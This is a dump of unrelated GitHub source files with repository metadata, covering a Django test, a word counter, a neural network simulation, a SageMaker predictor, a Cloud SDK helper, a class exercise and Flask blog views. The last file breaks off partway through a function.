f25fdbddc9fdfd5ca2a2de6f20f15a4640927b86 | 3ebb50b403ab32fccfab9279232682f1ef9005bf | /accounts/tests/test_views.py | bc42629b08a65c01768fbda34d5cf4a35350f4ea | [] | no_license | leoalmeidab/tdd-project | 69a6c8c046e89ef5e090e6b9c308b12cd01fbbb8 | 2b5ce5fac153124addffd1796ae37a1b94f4daf5 | refs/heads/main | 2023-07-01T14:16:02.987515 | 2021-08-13T22:57:17 | 2021-08-13T22:57:17 | 392,769,061 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 890 | py | from django.test import TestCase
import accounts.views
from unittest.mock import patch
class SendLoginEmailViewTest(TestCase):
def test_redirects_to_home_page(self):
response = self.client.post('/accounts/send_login_email', data={
'email': 'edith@example.com'
})
self.assertRedirects(response, '/')
@patch('accounts.views.send_mail')
def test_sends_mail_to_address_from_post(self, mock_send_mail):
self.client.post('/accounts/send_login_email', data={
'email': 'edith@example.com'
})
self.assertEqual(mock_send_mail.called, True)
(subject, body, from_email, to_list), kwargs = mock_send_mail.call_args
self.assertEqual(subject, 'Your login link for Superlists')
self.assertEqual(from_email, 'noreply@superlists')
self.assertEqual(to_list, ['edith@example.com'])
| [
"leonardobrito@dcc.ufmg.br"
] | leonardobrito@dcc.ufmg.br |
7cca7a15eb838322918f35d63c3ebf8e698d8601 | 2008aa05fc64a4787d6f2f0f9cdce4ce98dc9fe2 | /app/bootstrap/Directories.py | df88728830263ae9b801bf0902648127c3d5350a | [] | no_license | filljoyner/web-traffic-classifier | a7ff503a52287bf9f863e58f735dde564c960f96 | 38b2fe9cadc60d0610364a08204b85c0c62fb507 | refs/heads/master | 2020-06-24T08:40:58.655140 | 2019-07-26T02:09:14 | 2019-07-26T02:09:14 | 198,917,851 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 529 | py | from app.components.FileSystem import FileSystem
class Directories:
dirs = {
'base': None,
'logs': None,
'workspace': None
}
def __init__(self):
self.put('base', FileSystem.cwd())
self.put('logs', self.get('base') + '/logs')
self.put('workspace', self.get('base') + '/workspace')
def all(self):
return self.dirs
def put(self, dir_key, dir_value):
self.dirs[dir_key] = dir_value
def get(self, dir_key):
return self.dirs[dir_key] | [
"filljoyner@gmail.com"
] | filljoyner@gmail.com |
a995f929cf702e3cf0ce056d4ed20bda47b8f3d4 | ad6cc209b3251c2074920a893afcb48831af6dc1 | /word_count.py | 8eeb5a5efea83d6e3d3254384ea359306f820db3 | [] | no_license | ackendal/transcriptTools | 762efaadbef043c7e077b7b96ba1f63552a743c9 | 0ceefeb367dddae034264e9faee41e9407eac201 | refs/heads/master | 2022-11-23T23:37:18.075033 | 2020-07-29T16:34:36 | 2020-07-29T16:34:36 | 283,545,497 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,309 | py | #!/usr/bin/env python3
""" Alex Kendal, V00872134 *
* A program that reads a file and outputs a count of how *
* many words of all lengths it finds are in the file. *
* This list of counts can be sorted or unsorted (default) *
* and printed with or without (default) a list of the *
* words of each length. Only non letter characters are *
* .,();. *
"""
import argparse
import sys
"""
find_lowest_node: Function takes in a list and locates
the word that is alphabetically closest to a.
"""
def find_lowest_node(input):
min = input[0]
for word in input:
if word < min:
min = word
return min
"""
clear_special_characters: Function takes in a string
and strips text of all characters that are not letters,
including the enter key, and makes all letters
lowercase.
"""
def clear_special_characters(input):
output = ""
for c in input:
c = c.lower()
if((c == '(') or (c == ')') or (c == '.') or (c == ',') or (c == '-') or (c == '!')
or (c == ';') or (c == '?') or (c == '\n') or (c == '\r')):
c = ' '
output += c
return output
"""
max_length: Function takes in a list and outputs the
longest word length in the list.
"""
def max_length(input):
max = 0
for word in input:
if len(word) > max:
max = len(word)
return max
"""
frequencies: Function takes in a list of words and the
maximum length of a word and returns another list of
lengths and their corrosponding frequencies.
"""
def frequencies(input):
wordlist = []
added = 0;
count = -1;
backcount = 0;
print(input)
for x in range(0, len(input)):
word = input[x]
count = count+1
for tuple in wordlist:
if tuple[0] == word:
temp = (tuple[0], tuple[1]+1)
ind = wordlist.index((word, tuple[1]))
wordlist[ind] = temp;
added = 1;
count = -1;
if added == 0:
temp = (word, 1)
print(temp)
wordlist.append(temp)
count = -1;
added = 0
print(wordlist)
wordlist.sort(key = lambda tup: tup[1])
print(wordlist)
return wordlist
def print_nicely(input):
output = ""
count = 0;
for tuple in input:
output += (str(tuple[0]) + ": " + str(tuple[1]) + " ")
count = count + 1
if(count%5 == 0):
output += "\n"
print(output)
"""
check_counts: precursor to print_words(). Runs through
a list of words and an expected value to be the length
of. It returns the number of words of that length. *
"""
def check_counts(input, count):
num = 0
for word in input:
if(len(word) == count):
num = num + 1
return num
"""
print_by_length: Function to print in order from shortest
word length to longest. Takes in the list of frequencies
and whether to print words.
"""
def print_by_length(input, print_on, words):
output = ""
for x in range(len(input)):
l = str(input[x]['length'])
f = str(input[x]['frequency'])
output = ("Count[" + l + "]=" + f + ";")
if print_on:
output += (" " + print_words(words, input[x]['length']))
print(output)
"""
print_by_frequency: Function to print in order from
least to most common lengths. Takes in the list of
frequencies and whether to print words.
"""
def print_by_frequency(input, print_on, words):
output = ""
list = [x['frequency'] for x in input]
list.sort()
list.reverse()
for y in list:
length = len(input)
index = 0
while(index < length):
if(input[index]['frequency'] == y):
l = str(input[index]['length'])
f = str(y)
output = ("Count[" + l + "]=" + f + ";")
if print_on:
output += (" " + print_words(words, input[index]['length']))
print(output)
del input[index]
length = length - 1
index = 0
else:
index = index + 1
"""
print_words: Function to print words of a given length.
Takes in the list of words and the length to print.
"""
def print_words(input, count):
output = "(words: "
num = check_counts(input, count)
index = 0
if(num == 0):
return;
elif(num == 1):
for word in input:
if(len(word) == count):
output += ("\"" + word + "\")")
elif(num == 2):
for word in input:
if((len(word) == count) and (index < (num - 1))):
output += ("\"" + word + "\" ")
index = index + 1
elif(len(word) == count):
output += ("and \"" + word + "\")")
else:
for word in input:
if((len(word) == count) and (index < (num - 2))):
output += ("\"" + word + "\", ")
index = index + 1
elif((len(word) == count) and (index < (num - 1))):
output += ("\"" + word + "\" ")
index = index + 1
elif(len(word) == count):
output += ("and \"" + word + "\")")
return output
def main():
file = None
"""
Examining arguments from the command line. "--infile"
opens a file (specified in the following argument),
"--sort" turns the sort_on on, and "--print-words" turns
print_on on. Any other argument doesn't do anything.
"""
parser = argparse.ArgumentParser()
parser.add_argument("--infile", action="store")
parser.add_argument("--sort", action="store_true")
parser.add_argument("--print-words", action="store_true")
args = parser.parse_args()
if args.infile:
try:
file = open(args.infile, "r")
except FileNotFoundError:
print("Cannot open input file.")
sys.exit(1)
"""
Accessing the file and storing it to a string
so that it can be accessed by the program.
"""
if(file is None):
print("No file could be accessed.")
input = file.read()
file.close()
input = clear_special_characters(input)
words = input.split()
max = max_length(words)
freqlist = frequencies(words)
print_nicely(freqlist)
"""
Series of checks and functions calls. Options
are between displaying counts sorted or
unsorted, with or without a list of unique
words used.
"""
# if args.sort:
# print_by_frequency(freqlist, args.print_words, words)
# else:
# print_by_length(freqlist, args.print_words, words)
if __name__ == "__main__":
main() | [
"ackendal@gmail.com"
] | ackendal@gmail.com |
7b2892cad079451cba41a6e4aedb3f7b79329670 | 7e43049360db50a8f9cdcf1ca4e531bb0d2bfc84 | /Simulation_29_ROIs_WhiteNoiseInput.py | a05f5f4a89d9d9bfdcb99bab7e37cab42fcdb998 | [] | no_license | OliverMount/LargeScaleNetwork | 9543a57f56aa7945acf49a942f6685dcb1cf46b7 | f522e203c5de44bb0695bdb78dae170bd35e8f4f | refs/heads/master | 2023-04-12T23:25:36.845497 | 2021-04-20T02:23:09 | 2021-04-20T02:23:09 | 344,648,230 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,379 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 29 15:26:04 2021
@author: olive
"""
#------------------------------------------------------------------------------
# Necessary modules
#------------------------------------------------------------------------------
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
from numpy.random import normal as rnorm
p={} # Parameter dictionary
#------------------------------------------------------------------------------
# Network Parameters
#------------------------------------------------------------------------------
p['beta_exc'] = 0.066 # Hz/pA
p['beta_inh'] = 0.351 # Hz/pA
# Let us remember that we are keeping this as constant
p['tau_exc'] = 20 # ms #
p['tau_inh'] = 10 # ms
p['wEE'] = 24.3 # pA/Hz
p['wIE'] = 12.2 # pA/Hz
p['wEI'] = 19.7 # pA/Hz
p['wII'] = 12.5 # pA/Hz
p['muEE'] = 33.7 # pA/Hz
p['muIE'] = 25.3 # pA/Hz
p['eta'] = 0.68
####### ROI = 29 areas ################
with open("/home/olive/Desktop/LSN/Jog/distMatval.txt") as f:
contents=f.readlines()
DISTmtx =np.array([[float(k) for k in i.split()] for i in contents])
with open("/home/olive/Desktop/LSN/Jog/flnMatshuf2.txt") as f:
contents=f.readlines()
FLN=np.array([[float(k) for k in i.split()] for i in contents])
areas=['V1','V2','V4','DP','MT','8m','5','8I','TEO','2','F1','STPc','7A','46d',
'10','9/46v','9/46d','F5','TEpd','PBr','7m','7B','F2','STPi','PROm','F7',
'8B','STPr','24c']
hier=np.array([[0,0.2,0.45,0.5,0.51,0.55,0.58,0.6,0.61,0.63,0.67,
0.7,0.72,0.73,0.76,0.78,0.8,0.83,0.85,0.86,0.87,
0.95,0.96,0.965,0.97,0.98,0.985,0.99,1]])
p['hier_vals'] = hier
p['fln_mat']=FLN
p['areas']=areas
p['n_area']=len(p['areas'])
p['exc_scale'] = (1+p['eta']*p['hier_vals'])
# Sign function
fI = lambda x : x*(x>0) # f-I curve
########### Choose the injection area
area_act = 'V1'
print('Running network with stimulation to ' + area_act)
# Definition of combined parameters
local_EE = p['beta_exc'] * p['wEE'] * p['exc_scale']
local_EI = -p['beta_exc'] * p['wEI']
local_IE = p['beta_inh'] * p['wIE'] * p['exc_scale']
local_II = -p['beta_inh'] * p['wII']
fln_scaled = (p['exc_scale'] * p['fln_mat'].T).T
#---------------------------------------------------------------------------------
# Simulation Parameters
#---------------------------------------------------------------------------------
# White noise input parameters
me=2
SD=0.5 # Hz
dt = 0.2 # ms
T = 2500 # ms
t_plot = np.linspace(0, T, int(T/dt)+1)
n_t = len(t_plot)
E_back=10 # Back-ground rate for excitation
I_back=35 # Back-ground rate for inhibition
# From target background firing inverts background inputs
r_exc_tgt = E_back * np.ones(p['n_area'])
r_inh_tgt = I_back * np.ones(p['n_area'])
longrange_E = np.dot(fln_scaled,r_exc_tgt)
I_bkg_exc = r_exc_tgt - (local_EE*r_exc_tgt + local_EI*r_inh_tgt
+ p['beta_exc']*p['muEE']*longrange_E)
I_bkg_inh = r_inh_tgt - (local_IE*r_exc_tgt + local_II*r_inh_tgt
+ p['beta_inh']*p['muIE']*longrange_E)
# White noise stimulus input
I_stim_exc = np.zeros((n_t,p['n_area']))
area_stim_idx = p['areas'].index(area_act) # Index of stimulated area
area_no_stim=tuple([i for i in range(p['n_area']) if i != area_stim_idx])
#time_idx = (t_plot>100) & (t_plot<=350)
I_stim_exc[:,area_stim_idx] = rnorm(0,0.5,n_t)
I_stim_exc[:,area_no_stim] = rnorm(0,0.00005,(n_t,p['n_area']-1))
# Above value chosen so that V1 is driven up to 100 Hz
#---------------------------------------------------------------------------------
# Storage
#---------------------------------------------------------------------------------
r_exc = np.zeros((n_t,p['n_area']))
r_inh = np.zeros((n_t,p['n_area']))
#---------------------------------------------------------------------------------
# Initialization
#---------------------------------------------------------------------------------
# Set activity to background firing
r_exc[0] = r_exc_tgt
r_inh[0] = r_inh_tgt
#---------------------------------------------------------------------------------
# Running the network
#---------------------------------------------------------------------------------
for i_t in range(1, n_t):
longrange_E = np.dot(fln_scaled,r_exc[i_t-1])
print(longrange_E)
I_exc = (local_EE*r_exc[i_t-1] + local_EI*r_inh[i_t-1] +
p['beta_exc'] * p['muEE'] * longrange_E +
I_bkg_exc + I_stim_exc[i_t])
I_inh = (local_IE*r_exc[i_t-1] + local_II*r_inh[i_t-1] +
p['beta_inh'] * p['muIE'] * longrange_E + I_bkg_inh)
d_r_exc = -r_exc[i_t-1] + fI(I_exc)
d_r_inh = -r_inh[i_t-1] + fI(I_inh)
r_exc[i_t] = r_exc[i_t-1] + d_r_exc * dt/p['tau_exc']
r_inh[i_t] = r_inh[i_t-1] + d_r_inh * dt/p['tau_inh']
##############################################################################
########################### PLOTTING RESULTS #################################
##############################################################################
### Neural rate series plots
_ = plt.figure(figsize=(4,4))
area_name_list = p['areas']
area_idx_list = [-1]+[p['areas'].index(name) for name in area_name_list]
f, ax_list = plt.subplots(len(area_idx_list), sharex=True)
for ax, area_idx in zip(ax_list, area_idx_list):
if area_idx < 0:
y_plot = I_stim_exc[:, area_stim_idx]
txt = 'Input'
else:
y_plot = r_exc[:,area_idx]
txt = p['areas'][area_idx]
y_plot = y_plot - y_plot.min()
ax.plot(t_plot, y_plot)
ax.text(0.9, 0.6, txt, transform=ax.transAxes)
ax.set_yticks([y_plot.max()])
ax.set_yticklabels(['{:0.4f}'.format(y_plot.max())])
ax.spines["right"].set_visible(False)
ax.spines["top"].set_visible(False)
ax.xaxis.set_ticks_position('bottom')
ax.yaxis.set_ticks_position('left')
f.text(0.01, 0.5, 'Change in firing rate (Hz)', va='center', rotation='vertical')
ax.set_xlabel('Time (ms)')
#########################################################################
### Autocorrelation calculation, plots and exponential fits #############
#########################################################################
## ACF of the ROIs are stacked as columns of numpy array
import statsmodels.api as sm
from statsmodels.tsa.stattools import acf # For autocorrelation
from scipy.optimize import curve_fit # For exponential curve fitting
# Single exponential fit
def monoExp(x, tau):
return np.exp(-tau * x)
_ = plt.figure(figsize=(10,8))
nl=1000 # Lag index for autocorrelation
ACF=np.zeros((nl,p['n_area']))
m=np.zeros(p['n_area'])
Tau_esti=np.zeros(p['n_area'])
cols=['r','g','b','k'] # Colors for the plot
para=(30) # Initial value for optimization
for k in range(p['n_area']):
ACF[:,k]=acf(r_exc[:,k], nlags=nl-1)
plt.plot(np.arange(nl)*dt,ACF[:,k],cols[k],label=p['areas'][k])
# Cuve fitting
params,_ = curve_fit(monoExp, np.arange(nl)*dt,ACF[:,k],para)
#m[k]=params[0]
Tau_esti[k]=params[0]
plt.legend()
plt.xlim(np.array([0, nl])*dt)
plt.title("Autocorrelation of rate changes at different regions",size=20)
plt.xlabel("Lags (msec)",size=14)
plt.ylabel("Normalized Autocorrelation",size=14)
_ = plt.figure(figsize=(12,10))
for k in range(p['n_area']):
plt.subplot(int(str(22)+str(k+1)))
plt.plot(np.arange(nl)*dt,ACF[:,k],label="ACF data")
plt.plot(np.arange(nl)*dt,
monoExp(np.arange(nl)*dt,Tau_esti[k]),
'--', label="fitted")
plt.title(p['areas'][k] + "-- Esti. Tau: "+
str(round(1/Tau_esti[k],2)) + " msec" ,size=20)
"""
################ Creation of BOLD resting state from the neural signals #####
# Hemodynamic function
def Hemodynamic(n,TR,tauh=1.25*1e3,d=2.25*1e3):
# f=[]
# for k in range(n):
# f.append((((k*TR)-d)*np.exp(((k*TR)-d)/tauh))/tauh**2)
return [(((k*TR)-d)*np.exp(-((k*TR)-d)/tauh))/tauh**2 for k in range(n) if k!=0]
plt.plot(Hemodynamic(100,2))
############ COMPUTATION OF functional connectivity matrix ############
# def AUTOcorr(x,lags=10):
# M =len(x)
# r =np.zeros(M) # One-sided autocorrelation
# for i in range(M):
# r[i]=(1/(M-i))*(sum(x[0:(M-i)] * x[i:M])) # Dot product in r
# return(r[0:(lags+1)])
# lgs=1000
# AC1= AUTOcorr(r_exc[:,0],lgs)
# AC2=AUTOcorr(r_exc[:,1],lgs)
# plt.plot(AC1)
# plt.plot(AC2/max(AC2))
# plt.show()
# lgs=1000
# autocorrelation = np.correlate(r_exc[:,0], r_exc[:,0], mode="full")
# sm.graphics.tsa.plot_acf(r_exc[:,0], lags=lgs)
# sm.graphics.tsa.plot_acf(r_exc[:,1], lags=lgs)
# sm.graphics.tsa.plot_acf(r_exc[:,2], lags=lgs)
#import matplotlib
#matplotlib.pyplot.xcorr(r_exc[:,1], r_exc[:,1], normed=True, maxlags=1000)
# plt.plot(np.arange(nl)*dt,acf(r_exc[:,0], nlags=nl-1),'r',label=p['areas'][0])
# plt.plot(np.arange(nl)*dt,acf(r_exc[:,1], nlags=nl-1),'g',label=p['areas'][1])
# plt.plot(np.arange(nl)*dt,acf(r_exc[:,2], nlags=nl-1),'b',label=p['areas'][2])
# plt.plot(np.arange(nl)*dt,acf(r_exc[:,3], nlags=nl-1),'k',label=p['areas'][3])
# plt.legend()
# plt.xlim(np.array([0, nl])*dt)
# plt.title("Autocorrelation of rate changes at different regions",size=20)
#plt.ylim([0,1.1])
"""
| [
"j.olivermount@gmail.com"
] | j.olivermount@gmail.com |
00e434dbbfdc3a5a3c273251e6fcb2d07db1ba31 | 881c5baa69c6d43b05e56ce439c6c373b01644c9 | /serve/predict.py | 7b1e3dcb90e8f854304c3270120a2960faee637b | [
"MIT"
] | permissive | nitingupta180/sentiment-analysis | 8fff2988d16a70c76923227d464ad76b78aebe91 | 8d9ef710259f73d1a333560dd2a03fb7868c5ca3 | refs/heads/main | 2023-02-02T05:05:37.434928 | 2020-12-19T08:25:37 | 2020-12-19T08:25:37 | 322,539,148 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,147 | py | import argparse
import json
import os
import pickle
import sys
import sagemaker_containers
import pandas as pd
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.utils.data
from model import LSTMClassifier
from utils import review_to_words, convert_and_pad
def model_fn(model_dir):
"""Load the PyTorch model from the `model_dir` directory."""
print("Loading model.")
# First, load the parameters used to create the model.
model_info = {}
model_info_path = os.path.join(model_dir, 'model_info.pth')
with open(model_info_path, 'rb') as f:
model_info = torch.load(f)
print("model_info: {}".format(model_info))
# Determine the device and construct the model.
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model = LSTMClassifier(model_info['embedding_dim'], model_info['hidden_dim'], model_info['vocab_size'])
# Load the store model parameters.
model_path = os.path.join(model_dir, 'model.pth')
with open(model_path, 'rb') as f:
model.load_state_dict(torch.load(f))
# Load the saved word_dict.
word_dict_path = os.path.join(model_dir, 'word_dict.pkl')
with open(word_dict_path, 'rb') as f:
model.word_dict = pickle.load(f)
model.to(device).eval()
print("Done loading model.")
return model
def input_fn(serialized_input_data, content_type):
print('Deserializing the input data.')
if content_type == 'text/plain':
data = serialized_input_data.decode('utf-8')
return data
raise Exception('Requested unsupported ContentType in content_type: ' + content_type)
def output_fn(prediction_output, accept):
print('Serializing the generated output.')
return str(prediction_output)
def predict_fn(input_data, model):
print('Inferring sentiment of input data.')
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
if model.word_dict is None:
raise Exception('Model has not been loaded properly, no word_dict.')
# TODO: Process input_data so that it is ready to be sent to our model.
# You should produce two variables:
# data_X - A sequence of length 500 which represents the converted review
# data_len - The length of the review
input_data_to_words = review_to_words(input_data)
data_X, data_len = convert_and_pad(model.word_dict, input_data_to_words)
# Using data_X and data_len we construct an appropriate input tensor. Remember
# that our model expects input data of the form 'len, review[500]'.
data_pack = np.hstack((data_len, data_X))
data_pack = data_pack.reshape(1, -1)
data = torch.from_numpy(data_pack)
data = data.to(device)
# Make sure to put the model into evaluation mode
model.eval()
# TODO: Compute the result of applying the model to the input data. The variable `result` should
# be a numpy array which contains a single integer which is either 1 or 0
with torch.no_grad():
output = model.forward(data)
result = np.round(output.numpy())
return result
| [
"noreply@github.com"
] | nitingupta180.noreply@github.com |
4bfc954d67403dfc2b0f37cb258ad7d0fa939d04 | 0975a61b8b6d416892541f8d57425b7959418127 | /011兔子生兔子.py | 624e091deb7280202630e34bdab22e588eabaef8 | [] | no_license | minisstep/Runoob | 91757ebafba1b26964626ddc8a5dc67b0819c951 | 9aaf8a2b309e360d50192aa748ca2edfb9ec44e0 | refs/heads/master | 2020-04-24T18:05:06.717245 | 2017-06-10T22:49:22 | 2017-06-10T22:49:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | # -*- encoding: utf-8 -*-
__author__ = 'xgj1010'
__date__ = '2017/6/1 14:34'
"""
题目:古典问题:有一对兔子,从出生后第3个月起每个月都生一对兔子,小兔子长到第三个月后每个月又生一对兔子,假如兔子都不死,问每个月的兔子总数为多少?
程序分析:兔子的规律为数列1,1,2,3,5,8,13,21....
"""
a = 1
b = 1
for i in range(1, 22):
a, b = b, a+b
print b
| [
"869624090@qq.com"
] | 869624090@qq.com |
7fe354c98d8d01ba22505c5e5c51b733782f34d6 | a3cc7286d4a319cb76f3a44a593c4a18e5ddc104 | /lib/googlecloudsdk/api_lib/ml/vision/util.py | d48320c61c682ef73501c2c44fe8ff497a756db5 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | jordanistan/Google-Cloud-SDK | f2c6bb7abc2f33b9dfaec5de792aa1be91154099 | 42b9d7914c36a30d1e4b84ae2925df7edeca9962 | refs/heads/master | 2023-09-01T01:24:53.495537 | 2023-08-22T01:12:23 | 2023-08-22T01:12:23 | 127,072,491 | 0 | 1 | NOASSERTION | 2023-08-22T01:12:24 | 2018-03-28T02:31:19 | Python | UTF-8 | Python | false | false | 2,070 | py | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for gcloud ml vision commands."""
import os
import re
from googlecloudsdk.api_lib.util import apis
from googlecloudsdk.core import exceptions
VISION_API = 'vision'
VISION_API_VERSION = 'v1'
IMAGE_URI_FORMAT = r'^(https{,1}?|gs)://'
class Error(exceptions.Error):
"""Error for gcloud ml vision commands."""
class ImagePathError(Error):
"""Error if an image path is improperly formatted."""
def GetImageFromPath(path):
"""Builds an Image message from a path.
Args:
path: the path arg given to the command.
Raises:
ImagePathError: if the image path does not exist and does not seem to be
a remote URI.
Returns:
vision_v1_messages.Image: an image message containing information for the
API on the image to analyze.
"""
messages = apis.GetMessagesModule(VISION_API, VISION_API_VERSION)
image = messages.Image()
if os.path.isfile(path):
with open(path, 'rb') as content_file:
image.content = content_file.read()
elif re.match(IMAGE_URI_FORMAT, path):
image.source = messages.ImageSource(imageUri=path)
else:
raise ImagePathError(
'The image path does not exist locally or is not properly formatted. '
'A URI for a remote image must be a Google Cloud Storage image URI, '
'which must be in the form `gs://bucket_name/object_name`, or a '
'publicly accessible image HTTP/HTTPS URL. Please double-check your '
'input and try again.')
return image
| [
"jordan.robison@gmail.com"
] | jordan.robison@gmail.com |
41ba002d0b21ec0578f9bb7ef6d86ce45f0e7959 | b3b93c7db04c60c42fc4db58f1731a33a14fd621 | /python_oop/product/product.py | f73922c8449f0b60e9e6e82f2fa7bee0ed570326 | [] | no_license | scottcdudley/python_stack | 97d6d90179c26cc59cf926c5dcf45a6e99a918e0 | ac3c6fdedc19711a65d8467b65c96a3938e9c2a1 | refs/heads/master | 2020-03-23T20:31:22.410044 | 2018-07-23T17:24:15 | 2018-07-23T17:24:15 | 142,043,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,296 | py | class Product(object):
def __init__(self, price, item_name, weight, brand):
self.price = price
self.item_name = item_name
self.weight = weight
self.brand = brand
self.status = "for sale"
self.display_info()
def sell(self):
self.status = "sold"
return self
def add_tax(self, tax):
return self.price * (1 + tax)
def return_product(self, reason):
if reason.lower() == "defective":
self.price = 0
self.status = "Defective"
elif reason.lower() == "like new":
self.status = "for sale"
elif reason.lower() == "open":
self.status = "used"
self.price *= 0.8
return self
def display_info(self):
print "Item Name: {}".format(self.item_name)
print "Price: {}".format(self.price)
print "Weight: {}".format(self.weight)
print "Brand: {}".format(self.brand)
print "Status: {}".format(self.status)
return self
product1 = Product(200, 'Zune', '10oz', 'Microsoft')
print " "
print product1.add_tax(0.1)
print " "
product1.sell()
product1.display_info()
print " "
product1.return_product("defective")
product1.display_info()
print " "
product2 = Product(1000, "iPod", "1lb", "Apple")
print " "
print product2.add_tax(0.7)
print " "
product2.sell()
product2.display_info()
print " "
product2.return_product("open")
product2.display_info()
print " " | [
"scott.dudley@hotmail.com"
] | scott.dudley@hotmail.com |
b8b7d3f5077d58a59b998dd73967b10c99685258 | fddda95237f380caf022a84c7949e979dc62777f | /app/main/views.py | fc82df790404030af7a35ae1fa557963ef7a449b | [] | no_license | xxxxsk/learn_flask | 0caa6d919469ccf5c910b76c92e30ca3cf3823cf | 3279d70846255cceef78ffdc00025751ca28e6de | refs/heads/master | 2022-12-09T09:50:58.735108 | 2019-01-08T12:22:19 | 2019-01-08T12:22:19 | 161,746,831 | 0 | 0 | null | 2022-09-16T17:54:49 | 2018-12-14T07:17:53 | Python | UTF-8 | Python | false | false | 10,092 | py | from flask import render_template, redirect, url_for, abort, flash, request,\
current_app, make_response
from flask_login import login_required, current_user
from flask_sqlalchemy import get_debug_queries
from . import main
from .forms import EditProfileForm, EditProfileAdminForm, PostForm,\
CommentForm
from .. import db
from ..models import Permission, Role, User, Post, Comment
from ..decorators import admin_required, permission_required
@main.after_app_request
def after_request(response):
for query in get_debug_queries():
if query.duration >= current_app.config['FLASKY_SLOW_DB_QUERY_TIME']:
current_app.logger.warning(
'Slow query: %s\nParameters: %s\nDuration: %fs\nContext: %s\n'
% (query.statement, query.parameters, query.duration,
query.context))
return response
@main.route('/shutdown')
def server_shutdown():
if not current_app.testing:
abort(404)
shutdown = request.environ.get('werkzeug.server.shutdown')
if not shutdown:
abort(500)
shutdown()
return 'Shutting down...'
@main.route('/', methods=['GET', 'POST'])
def index():
form = PostForm()
if current_user.can(Permission.WRITE) and form.validate_on_submit():
post = Post(body=form.body.data,
author=current_user._get_current_object())
db.session.add(post)
db.session.commit()
return redirect(url_for('.index'))
page = request.args.get('page', 1, type=int)
show_followed = False
if current_user.is_authenticated:
show_followed = bool(request.cookies.get('show_followed', ''))
if show_followed:
query = current_user.followed_posts
else:
query = Post.query
pagination = query.order_by(Post.timestamp.desc()).paginate(
page, per_page=current_app.config['FLASKY_POSTS_PER_PAGE'],
error_out=False)
posts = pagination.items
return render_template('index.html', form=form, posts=posts,
show_followed=show_followed, pagination=pagination)
@main.route('/user/<username>')
def user(username):
user = User.query.filter_by(username=username).first_or_404()
page = request.args.get('page', 1, type=int)
pagination = user.posts.order_by(Post.timestamp.desc()).paginate(
page, per_page=current_app.config['FLASKY_POSTS_PER_PAGE'],
error_out=False)
posts = pagination.items
return render_template('user.html', user=user, posts=posts,
pagination=pagination)
@main.route('/edit-profile', methods=['GET', 'POST'])
@login_required
def edit_profile():
form = EditProfileForm()
if form.validate_on_submit():
current_user.name = form.name.data
current_user.location = form.location.data
current_user.about_me = form.about_me.data
db.session.add(current_user._get_current_object())
db.session.commit()
flash('Your profile has been updated.')
return redirect(url_for('.user', username=current_user.username))
form.name.data = current_user.name
form.location.data = current_user.location
form.about_me.data = current_user.about_me
return render_template('edit_profile.html', form=form)
@main.route('/edit-profile/<int:id>', methods=['GET', 'POST'])
@login_required
@admin_required
def edit_profile_admin(id):
user = User.query.get_or_404(id)
form = EditProfileAdminForm(user=user)
if form.validate_on_submit():
user.email = form.email.data
user.username = form.username.data
user.confirmed = form.confirmed.data
user.role = Role.query.get(form.role.data)
user.name = form.name.data
user.location = form.location.data
user.about_me = form.about_me.data
db.session.add(user)
db.session.commit()
flash('The profile has been updated.')
return redirect(url_for('.user', username=user.username))
form.email.data = user.email
form.username.data = user.username
form.confirmed.data = user.confirmed
form.role.data = user.role_id
form.name.data = user.name
form.location.data = user.location
form.about_me.data = user.about_me
return render_template('edit_profile.html', form=form, user=user)
@main.route('/post/<int:id>', methods=['GET', 'POST'])
def post(id):
post = Post.query.get_or_404(id)
form = CommentForm()
if form.validate_on_submit():
comment = Comment(body=form.body.data,
post=post,
author=current_user._get_current_object())
db.session.add(comment)
db.session.commit()
flash('Your comment has been published.')
return redirect(url_for('.post', id=post.id, page=-1))
page = request.args.get('page', 1, type=int)
if page == -1:
page = (post.comments.count() - 1) // \
current_app.config['FLASKY_COMMENTS_PER_PAGE'] + 1
pagination = post.comments.order_by(Comment.timestamp.asc()).paginate(
page, per_page=current_app.config['FLASKY_COMMENTS_PER_PAGE'],
error_out=False)
comments = pagination.items
return render_template('post.html', posts=[post], form=form,
comments=comments, pagination=pagination)
@main.route('/edit/<int:id>', methods=['GET', 'POST'])
@login_required
def edit(id):
post = Post.query.get_or_404(id)
if current_user != post.author and \
not current_user.can(Permission.ADMIN):
abort(403)
form = PostForm()
if form.validate_on_submit():
post.body = form.body.data
db.session.add(post)
db.session.commit()
flash('The post has been updated.')
return redirect(url_for('.post', id=post.id))
form.body.data = post.body
return render_template('edit_post.html', form=form)
@main.route('/follow/<username>')
@login_required
@permission_required(Permission.FOLLOW)
def follow(username):
user = User.query.filter_by(username=username).first()
if user is None:
flash('Invalid user.')
return redirect(url_for('.index'))
if current_user.is_following(user):
flash('You are already following this user.')
return redirect(url_for('.user', username=username))
current_user.follow(user)
db.session.commit()
flash('You are now following %s.' % username)
return redirect(url_for('.user', username=username))
@main.route('/unfollow/<username>')
@login_required
@permission_required(Permission.FOLLOW)
def unfollow(username):
user = User.query.filter_by(username=username).first()
if user is None:
flash('Invalid user.')
return redirect(url_for('.index'))
if not current_user.is_following(user):
flash('You are not following this user.')
return redirect(url_for('.user', username=username))
current_user.unfollow(user)
db.session.commit()
flash('You are not following %s anymore.' % username)
return redirect(url_for('.user', username=username))
@main.route('/followers/<username>')
def followers(username):
